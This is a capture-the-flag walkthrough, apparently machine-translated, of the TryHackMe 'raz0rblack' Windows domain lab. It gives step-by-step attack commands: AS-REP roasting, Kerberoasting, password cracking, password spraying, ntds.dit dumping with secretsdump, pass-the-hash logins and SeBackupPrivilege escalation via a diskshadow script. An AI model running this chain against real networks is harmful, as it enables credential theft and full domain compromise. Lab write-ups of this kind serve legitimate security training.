raz0rblack by THM writeup

Greetings, dear kulkhatskers. This write-up will be dedicated to the passage of the car raz0rblack on TryHackMe

Disclaimer: all utilities and techniques demonstrated in the article are provided for educational purposes.

Step 0: Scan with Nmap

Traditionally, we start by scanning the network using Nmap

nmap -sC -sV -T4

-sC -> option that starts script-based scanning
-sV -> determines the versions of services running on open ports
-T4 -> scan time

Scan result

Scan result

Hmm, doesn’t seem to be anything remarkable. Let’s try to enumerate NFS

Network File System (NFS) is a distributed file system that provides users with access to files located on remote computers and allows them to work with these files in the same way as with local ones

nmap -sV –script=nfs* -p 111
The result of the Nmap script

The result of the Nmap script

Step 1: Use showmount

We can also find NFS using the utility showmount

showmount -e
Result of showmount request

Result of showmount request

Step 2: Mount /users

Create a mount point and mount the folder /users

mount -t nfs ./creds

Having looked at its contents, we will see two files

The txt will contain our flag, but the xlsx will contain a list of users


To do this we will use the module GetNPUsers from the utility Impacket

GetNPUsers raz0rblack.thm/ -userfile /root/users.txt -dc-ip

The result of the utility will be an intercepted AS-REP user request twilliams

Step 4: Brute force using JohnTheRipper

Having intercepted the request, we can launch a local search to obtain the password in clear text. Let’s use the utility JohnTheRipper

john --rules --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Step 5: Use CrackMapExec

Knowing the account information, let’s run crackmapexec to enumerate users using RID brute force

crackmapexec smb -u twilliams -p roastpotatoes --rid-brute

As a result of the work, we will obtain new valid users for further attack: xyan1d3, lvetrova, sbradley
Let’s use it again crackmapexec to spray password for specified users

Step 6: Use smbpasswd to change the password

As you can see, the user sbradley worth the status STATUS_PASSWORD_MUST_CHANGE. To change the password, use the utility smbpasswd

smbpasswd -r -U sbradley

-r -> option to specify the address of the remote machine
-U -> option to specify user

Step 7: Forward smbmap

Next we will use the utility SMBMap

Next we will use the utility SMBMap

SMBMap allows users to list samba shared drives across an entire domain. The program compiles a list of shared disks, disk access rights, shared content, has upload/download functionality, automatic downloading of files whose name matches the sample, and even the ability to remotely execute commands. This tool was created for penetration testing and is designed to make it easier to find potentially sensitive data in large networks

smbmap -H -u sbradley -p password

As a result, we will see a list of available shares. Most likely we will be interested /trash

Step 8: Connect via smbclient

To view potentially interesting files, connect via smb using smbclient

smbclient // --user="sbradley%password"

Let’s download the available files. These will include a password-protected archive

Step 9: Use zip2john

To crack the archive password, we will use utilities Zip2John And JohnTheRipper

zip2john experiment_gone_wrong.zip > zip_hash.txt
john --rules --wordlist=/usr/share/wordlists/rockyou.txt zip_hash.txt

Having received the password in clear text, unpack the archive which contains system.hive And ntds.dit

Step 10: Retrieving secrets from files

To locally extract user secrets we will use the module secretsdump from the utility Impacket

impacket-secretsdump --system system.hive -ntds ntds.dit LOCAL > dump.txt

To separate hashes from a file, use the following command

Step 11: CrackMapExec to find a suitable hash

To select a hash for a user lvetrova Let’s use the utility again crackmapexec

crackmapexec smb -u lvetrova -H hashes.txt

Step 12: Evil-WinRM

For remote connection we will use Evil-WinRM

evil-winrm -i -u lvetrova -H f220d3988deb3f516c73f40ee16c431d

Having looked at the contents of the user’s folder, we will see the file lvetrova.xml

PowerShell has a method for storing encrypted credentials that can only be accessed by the user account that saved them. The above code prompts for credentials and then stores them encrypted in an XML file. As a result, we get the user flag lvetrova

Step 13: Conduct kerberoasting

Next, knowing the username and hash of his password, we will carry out the attack Kerberoastingusing GetUserSPNsby requesting TGS

GetUserSPNs -dc-ip raz0black.thm\lvetrova -hashes f220d3988deb3f516c73f40ee16c431d:f220d3988deb3f516c73f40ee16c431d -outputfile kerb.txt

Also, having intercepted TGS, we will use john for local password search

john --rules --wordlist=/usr/share/wordlists/rockyou.txt kerb.txt

Step 14: Evil-WinRM with xyan1d3 data

evil-winrm -i -u xyan1d3 -p cyanide9amine5628
whoami /all

The user has privilege SeBackupPrivilege. It was designed for the purpose of creating backup copies for users. This privilege should bypass any ACLs set by the administrator on the network. So, in a nutshell, this privilege allows the user to read any file on the entire file system, which may also include some sensitive files such as the SAM file or the SYSTEM registry file. From an attacker’s perspective, this privilege can be exploited after gaining a foothold on the system and then going into an elevated shell, reading SAM files and possibly cracking the passwords of highly privileged users on the system or network

To implement privilege escalation, we need a utility diskshadow.exescript and two DLLs: SeBackupPrivilegeUtils.dll And SeBackupPrivilegeCmdLets.dll

Let’s also create the following script to perform shadow copying and call it diskshadow.txt:

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context persistentX
begin backupX
add volume C: alias cdriveX
expose %cdrive% E:X
end backupX

set verbose onX -> will output detailed execution information
set metadata -> specifies the location of the metadata file for creating shadow copies

set context persistentX -> installs a persistent shadow copy that will persist after the Diskshadow exit command and will survive a computer reboot

begin backupX -> starts the shadow copy process

add volume C: alias cdriveX -> Alias ​​gives a name to the shadow identifier

createX -> creates a snapshot virtual disk on the DataCore Server and services the virtual disk on the same computer

expose %cdrive% E:X -> Reveals the shadow identifier to the operating system and assigns the letter X to the specified drive:

end backupX -> ends the shadow copy process

Load the script using the command:

upload diskshadow.txt

We will also download 2 DLLs, which can be downloaded from here:

wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll
wget https://github.com/giuliano108/SeBackupPrivilege/raw/master/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll

and also download them via the command upload. After loading the DLL for operation, we will write the following:

import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeCmdLets.dll

Having completed all the procedures, we launch our script through the utility diskshadow.exe

diskshadow.exe /s C:\tmp\diskshadow.txt

/s-> specifies the location of the script

After successfully creating a shadow copy, use the utility robocopy

robocopy /b E:\windows\ntds . ntds.dit

/b -> copies files in backup mode, which allows Robocopy to override file and folder permission settings (ACLs). This allows you to copy files that you might not otherwise have access to, as long as they are running under an account with sufficient privileges

After that, copy the registry hive SYSTEM via the reg save command and download our files

reg save HKLM\SYSTEM C:\tmp\system

Step 15: Get the credentials again

After downloading files ntds.dit And system Let’s make a local dump of secrets from these files using secretsdump

impacket-secretsdump -system system -ntds ntds.dit LOCAL

Step 16: Connect with admin credentials

Having received the administrator hash, we will connect using the same evil-winrm

evil-winrm -i -u administrator -H 9689931bed40ca5a2ce1218210177f0c

Let’s view the contents of the administrator folder

By using type let’s open the file root.xml

This is our flag. Convert from hex to plain text:

Here is your Root Flag

Let’s also find the user flag twilliams

And the final touch: after looking at all the folders, we will find the directory Top Secretwe’ll see the picture there and download it

That’s all we wanted to show in this analysis. Remember: there are no 100% resistant systems. Practice, because absolutely any pentester will be nowhere without it!

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *